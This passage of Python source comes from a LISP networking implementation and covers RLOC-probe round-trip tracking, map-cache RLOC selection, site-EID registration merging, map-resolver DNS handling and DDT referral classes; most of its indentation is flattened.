if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
                ttl = str(ttl/60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
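    #
    # Illustrative print_ttl() outputs (sketch only): 7200 -> "2 hours",
    # 5400 -> "90 mins", 90 -> "90 secs", None -> "forever".
    #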
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
return(elapsed >= self.map_cache_ttl)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
        #endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
        # and best list. We need to set the timestamp last_rloc_probe or
        # lisp_process_rloc_probe_timer() will think the unreach RLOC went
        # down and is waiting for an RLOC-probe reply that will never arrive.
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
        # Put RLOC in lisp.lisp_rloc_probe_list if it doesn't exist. And if
        # we removed the RLOC from the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
        if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
        # If this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
        # Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
        # Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
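    #
    # Example that follows directly from the format string above: a site-EID
    # registered with only proxy-reply and merge semantics requested prints
    # as "P-s-i-t-R-m-n".
    #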
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
                if (new_rle.has_key(addr)): continue
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
        if (sorted(old_rle.keys()) == sorted(new_rle.keys())): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no
        # longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
